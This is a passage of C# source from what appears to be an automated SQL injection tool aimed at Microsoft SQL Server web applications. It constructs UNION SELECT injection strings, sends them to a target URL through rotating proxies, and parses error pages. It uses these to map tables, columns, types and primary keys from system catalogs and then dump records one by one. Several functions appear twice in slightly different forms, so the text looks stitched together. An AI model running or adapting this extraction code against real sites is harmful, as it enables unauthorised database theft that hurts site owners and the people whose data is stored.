// }}}
// {{{ ParseGroupedHaving
/// <summary>
/// Parse the error generated by a HAVING error that has a GROUP BY clause
/// </summary>
/// <param name="HTMLCode">The HTML text from the resulting error page</param>
/// <param name="Plugin">The Plugin to use to identify the data type</param>
/// <returns>The name of the field that caused the error</returns>
public static GlobalDS.Field ParseGroupedHaving(string HTMLCode, IErrorPlugin Plugin)
{
GlobalDS.Field retVal = new GlobalDS.Field();
int StartError, StartData, EndError, StartSize;
string ErrorData;
// Initialize retVal
retVal.DataType = SqlDbType.Variant;
retVal.FieldName = String.Empty;
// Check for first half of the error
StartError = HTMLCode.IndexOf(Plugin.HavingErrorPre);
StartSize = Plugin.HavingErrorPre.Length;
if (StartError >= 0)
{
// Now check for the second half of the error
EndError = HTMLCode.IndexOf(Plugin.HavingErrorPost);
if (EndError < StartError)
{
EndError = HTMLCode.IndexOf(Plugin.HavingErrorPostWithGroupBy);
}
if (EndError > StartError)
{
StartData = StartError + StartSize;
ErrorData = HTMLCode.Substring(StartData, EndError - StartData);
retVal.FieldName = ErrorData;
}
}
// Return the information
return(retVal);
}
private GlobalDS.Field GetFieldData(long TableID, int FieldID)
{
GlobalDS.Field retVal = new GlobalDS.Field();
StringBuilder WhereClause = new StringBuilder();
WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
string[] values = PulledData.Split(':');
retVal.FieldName = values[0];
retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim()));
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
if (PulledData.Length > 0)
{
PulledData = PulledData.Substring(1, PulledData.Length - 1);
retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
}
return(retVal);
}
private void TypeCastAttackVector()
{
StringBuilder CurrentVector = new StringBuilder();
for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
{
UserStatus(String.Format("Counter is at {0} of {1}", FieldCounter, _QueryStructure.Count));
CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer).Append(" UNION SELECT SUM(");
CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).FullName);
CurrentVector.Append(") FROM ");
CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).TableName);
CurrentVector.Append("--");
_AttackParams[_VectorName] = CurrentVector.ToString();
string ResultPage;
UserStatus(String.Format("hmm: {0}", CurrentVector.ToString()));
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
GlobalDS.Field dbg = (GlobalDS.Field)_QueryStructure[FieldCounter];
dbg.DataType = ParsePage.ParseUnionSumError(ResultPage, _Plugin);
// ## DEBUG
UserStatus(String.Format("Resulting Data: {0} - {1}", dbg.FullName, dbg.DataType));
_QueryStructure[FieldCounter] = dbg;
}
UserStatus("Finished Typecasting..");
}
private void RefinedTypeCasting()
{
StringBuilder CurrentVector = new StringBuilder();
List <int> IntList = FindAllVariInts(_QueryStructure);
for (int IntCounter = 0; IntCounter < IntList.Count; IntCounter++)
{
UserStatus("Refining Integer #" + IntCounter);
CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer).Append(" UNION ALL SELECT ");
for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
{
if (FieldCounter == (int)IntList[IntCounter] || ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.VarChar ||
((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Char ||
((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.NVarChar)
{
//CurrentVector.Append("@@version,");
CurrentVector.Append("char(0x61),");
} // Text and NText are a pain in the ASS
else if (((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Text ||
((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.NText ||
((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Variant)
{
CurrentVector.Append("NULL,");
}
else
{
UserStatus(String.Format("Refining {0}", ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType));
CurrentVector.Append("1,");
}
}
CurrentVector.Remove(CurrentVector.Length - 1, 1);
CurrentVector.Append(" ORDER BY 1--");
_AttackParams[_VectorName] = CurrentVector.ToString();
string ResultPage;
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
GlobalDS.Field AdjustedField = (GlobalDS.Field)_QueryStructure[(int)IntList[IntCounter]];
AdjustedField.DataType = ParsePage.ParseUnionSelectForIntegerRefinement(ResultPage, _Plugin);
_QueryStructure[(int)IntList[IntCounter]] = AdjustedField;
}
UserStatus("Finished Refining Typecasts");
}
private SqlErrorAttackVector DeserializeSqlErrorAttackVectorXml(XmlNode VectorNode, IErrorPlugin PluginUsed)
{
List <GlobalDS.Field> ElementList = new List <GlobalDS.Field>();
XmlNodeList AttackElements = VectorNode.SelectNodes("entry");
if (AttackElements.Count > 0)
{
foreach (XmlNode ele in AttackElements)
{
GlobalDS.Field NewField = new GlobalDS.Field();
string fieldname = "";
if (ele.Attributes["field"] != null)
{
fieldname = ele.Attributes["field"].InnerText;
if (ele.Attributes["table"] != null)
{
fieldname = ele.Attributes["table"].InnerText + "." + fieldname;
}
NewField.FieldName = fieldname;
}
if (ele.Attributes["datatype"] != null)
{
NewField.DataType = (SqlDbType)System.Enum.Parse(typeof(SqlDbType), ele.Attributes["datatype"].InnerText);
}
ElementList.Add(NewField);
}
}
string Name = "";
string Buffer = "";
if (VectorNode.Attributes["name"] != null)
{
Name = VectorNode.Attributes["name"].InnerText;
}
if (VectorNode.Attributes["buffer"] != null)
{
Buffer = VectorNode.Attributes["buffer"].InnerText;
}
return(new SqlErrorAttackVector(_TargetURL, _Method, ElementList, Name, Buffer, _AttackParams, PluginUsed));
}
// }}}
// {{{ PullDataFromIndividualTable
private List <Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
List <Hashtable> retVal = new List <Hashtable>();
long RecordCounter = 0;
GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
int ColumnCounter = 0;
string PrimaryKeyName = String.Empty;
SqlDbType PrimaryKeyType = SqlDbType.Int;
UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
// Generate Field List
for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
{
UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
{
ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
ColumnCounter++;
}
if (SrcTable.FieldList[FieldCounter].IsPrimary)
{
PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
}
}
if (PrimaryKeyName.Length > 0)
{
for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
{
CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
retVal.Add(Record);
OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
}
}
return(retVal);
}
// }}}
// {{{ GetFieldData
private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
{
DictionaryEntry retVal = new DictionaryEntry();
retVal.Key = Column.FieldName;
retVal.Value = string.Empty;
if (Column.FieldName.Equals(pk.Name))
{
retVal.Value = pk.Value;
return(retVal);
}
StringBuilder SelectClause = new StringBuilder();
switch (Column.DataType)
{
case SqlDbType.BigInt:
case SqlDbType.SmallInt:
case SqlDbType.TinyInt:
case SqlDbType.Int:
case SqlDbType.Decimal:
case SqlDbType.DateTime:
case SqlDbType.Money:
case SqlDbType.Float:
case SqlDbType.Real:
case SqlDbType.SmallDateTime:
case SqlDbType.SmallMoney:
case SqlDbType.Timestamp:
case SqlDbType.UniqueIdentifier:
//retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
break;
case SqlDbType.NChar:
case SqlDbType.Char:
case SqlDbType.NVarChar:
case SqlDbType.Text:
case SqlDbType.NText:
case SqlDbType.VarChar:
//retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
break;
case SqlDbType.Bit:
//retVal.Value = GetBitField(Column.FieldName, TableName, pk);
SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
break;
case SqlDbType.Image:
case SqlDbType.Binary:
case SqlDbType.VarBinary:
// TODO: Figure out how to support this!
//retVal.Value = null;
break;
}
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
retVal.Value = ResultText.Substring(1, ResultText.Length - 2);
return(retVal);
}
private void DeserializeSchemaXml(XmlNode TargetNode)
{
// Init member vars
_Username = ""; _AllTablesRetrieved = true;
if (TargetNode.Attributes["username"] != null)
{
_Username = TargetNode.Attributes["username"].InnerText;
}
if (TargetNode.Attributes["tablesfinished"] != null)
{
_AllTablesRetrieved = bool.Parse(TargetNode.Attributes["tablesfinished"].InnerText);
}
XmlNodeList Tables = TargetNode.SelectNodes("table");
if (Tables.Count > 0)
{
List <GlobalDS.Table> TableList = new List <GlobalDS.Table>();
foreach (XmlNode ExtractedTable in Tables)
{
GlobalDS.Table ThisTable = new GlobalDS.Table();
if (ExtractedTable.Attributes["name"] != null && ExtractedTable.Attributes["id"] != null)
{
ThisTable.Name = ExtractedTable.Attributes["name"].InnerText;
ThisTable.ObjectID = System.Int32.Parse(ExtractedTable.Attributes["id"].InnerText);
if (ExtractedTable.Attributes["recordcount"] != null)
{
ThisTable.RecordCount = System.Int64.Parse(ExtractedTable.Attributes["recordcount"].InnerText);
}
XmlNodeList Fields = ExtractedTable.SelectNodes("field");
foreach (XmlNode ExtractedField in Fields)
{
GlobalDS.Field ThisField = new GlobalDS.Field();
if (ExtractedField.Attributes["name"] != null)
{
ThisField.FieldName = ExtractedField.Attributes["name"].InnerText;
}
if (ExtractedField.Attributes["datatype"] != null)
{
ThisField.DataType = (System.Data.SqlDbType)System.Enum.Parse(typeof(System.Data.SqlDbType), ExtractedField.Attributes["datatype"].InnerText);
}
if (ExtractedField.Attributes["primary"] != null)
{
try
{
ThisField.IsPrimary = bool.Parse(ExtractedField.Attributes["primary"].InnerText);
}
catch (System.FormatException)
{
ThisField.IsPrimary = false;
}
}
ThisTable.AddField(ThisField);
}
TableList.Add(ThisTable);
}
}
_DBTables = TableList.ToArray();
}
}
// }}}
// {{{ PullDataFromIndividualTable
private List<Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
List<Hashtable> retVal = new List<Hashtable>();
long RecordCounter = 0;
GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
int ColumnCounter = 0;
string PrimaryKeyName = String.Empty;
SqlDbType PrimaryKeyType= SqlDbType.Int;
UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
// Generate Field List
for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
{
UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
{
ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
ColumnCounter++;
}
if (SrcTable.FieldList[FieldCounter].IsPrimary)
{
PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
}
}
if (PrimaryKeyName.Length > 0)
{
for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
{
CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
retVal.Add(Record);
OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
}
}
return retVal;
}
private GlobalDS.Field GetFieldData(long TableID, int FieldID)
{
GlobalDS.Field retVal = new GlobalDS.Field();
StringBuilder WhereClause = new StringBuilder();
WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
string[] values = PulledData.Split(':');
retVal.FieldName = values[0];
retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim()));
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
if (PulledData.Length > 0)
{
PulledData = PulledData.Substring(1, PulledData.Length -1);
retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
}
return retVal;
}
// }}}
// {{{ ParseGroupedHaving
/// <summary>
/// Parse the error generated by a HAVING error that has a GROUP BY clause
/// </summary>
/// <param name="HTMLCode">The HTML text from the resulting error page</param>
/// <param name="Plugin">The Plugin to use to identify the data type</param>
/// <returns>The name of the field that caused the error</returns>
public static GlobalDS.Field ParseGroupedHaving(string HTMLCode, IErrorPlugin Plugin)
{
GlobalDS.Field retVal = new GlobalDS.Field();
int StartError, StartData, EndError, StartSize;
string ErrorData;
// Initialize retVal
retVal.DataType = SqlDbType.Variant;
retVal.FieldName = String.Empty;
// Check for first half of the error
StartError = HTMLCode.IndexOf(Plugin.HavingErrorPre);
StartSize = Plugin.HavingErrorPre.Length;
if (StartError >= 0)
{
// Now check for the second half of the error
EndError = HTMLCode.IndexOf(Plugin.HavingErrorPost);
if (EndError < StartError)
EndError = HTMLCode.IndexOf(Plugin.HavingErrorPostWithGroupBy);
if (EndError > StartError)
{
StartData = StartError + StartSize;
ErrorData = HTMLCode.Substring(StartData, EndError - StartData);
retVal.FieldName = ErrorData;
}
}
// Return the information
return retVal;
}
private GlobalDS.Field RetrieveField(long FieldID, long TableID, long PrimaryKey)
{
GlobalDS.Field RetVal = new GlobalDS.Field();
RetVal.FieldName = GetFieldName(FieldID, TableID);
RetVal.DataType = GetFieldDataType(FieldID, TableID);
RetVal.IsPrimary = (PrimaryKey == FieldID);
return RetVal;
}
private SqlErrorAttackVector DeserializeSqlErrorAttackVectorXml(XmlNode VectorNode, IErrorPlugin PluginUsed)
{
List<GlobalDS.Field> ElementList = new List<GlobalDS.Field>();
XmlNodeList AttackElements = VectorNode.SelectNodes("entry");
if (AttackElements.Count > 0)
{
foreach (XmlNode ele in AttackElements)
{
GlobalDS.Field NewField = new GlobalDS.Field();
string fieldname = "";
if (ele.Attributes["field"] != null)
{
fieldname = ele.Attributes["field"].InnerText;
if (ele.Attributes["table"] != null)
{
fieldname = ele.Attributes["table"].InnerText + "." + fieldname;
}
NewField.FieldName = fieldname;
}
if (ele.Attributes["datatype"] != null)
{
NewField.DataType = (SqlDbType) System.Enum.Parse(typeof(SqlDbType), ele.Attributes["datatype"].InnerText);
}
ElementList.Add(NewField);
}
}
string Name = "";
string Buffer = "";
if (VectorNode.Attributes["name"] != null){Name = VectorNode.Attributes["name"].InnerText;}
if (VectorNode.Attributes["buffer"] != null){Buffer = VectorNode.Attributes["buffer"].InnerText;}
return new SqlErrorAttackVector(_TargetURL, _Method, ElementList, Name, Buffer, _AttackParams, PluginUsed);
}
private void DeserializeSchemaXml(XmlNode TargetNode)
{
// Init member vars
_Username = "";_AllTablesRetrieved = true;
if (TargetNode.Attributes["username"] != null)
{
_Username = TargetNode.Attributes["username"].InnerText;
}
if (TargetNode.Attributes["tablesfinished"] != null)
{
_AllTablesRetrieved = bool.Parse(TargetNode.Attributes["tablesfinished"].InnerText);
}
XmlNodeList Tables = TargetNode.SelectNodes("table");
if (Tables.Count > 0)
{
List<GlobalDS.Table> TableList = new List<GlobalDS.Table>();
foreach (XmlNode ExtractedTable in Tables)
{
GlobalDS.Table ThisTable = new GlobalDS.Table();
if (ExtractedTable.Attributes["name"] != null && ExtractedTable.Attributes["id"] != null)
{
ThisTable.Name = ExtractedTable.Attributes["name"].InnerText;
ThisTable.ObjectID = System.Int32.Parse(ExtractedTable.Attributes["id"].InnerText);
if (ExtractedTable.Attributes["recordcount"] != null)
{
ThisTable.RecordCount = System.Int64.Parse(ExtractedTable.Attributes["recordcount"].InnerText);
}
XmlNodeList Fields = ExtractedTable.SelectNodes("field");
foreach (XmlNode ExtractedField in Fields)
{
GlobalDS.Field ThisField = new GlobalDS.Field();
if (ExtractedField.Attributes["name"] != null)
{
ThisField.FieldName = ExtractedField.Attributes["name"].InnerText;
}
if (ExtractedField.Attributes["datatype"] != null)
{
ThisField.DataType = (System.Data.SqlDbType) System.Enum.Parse(typeof(System.Data.SqlDbType),ExtractedField.Attributes["datatype"].InnerText);
}
if (ExtractedField.Attributes["primary"] != null)
{
try
{
ThisField.IsPrimary = bool.Parse(ExtractedField.Attributes["primary"].InnerText);
}
catch (System.FormatException)
{
ThisField.IsPrimary = false;
}
}
ThisTable.AddField(ThisField);
}
TableList.Add(ThisTable);
}
}
_DBTables = TableList.ToArray();
}
}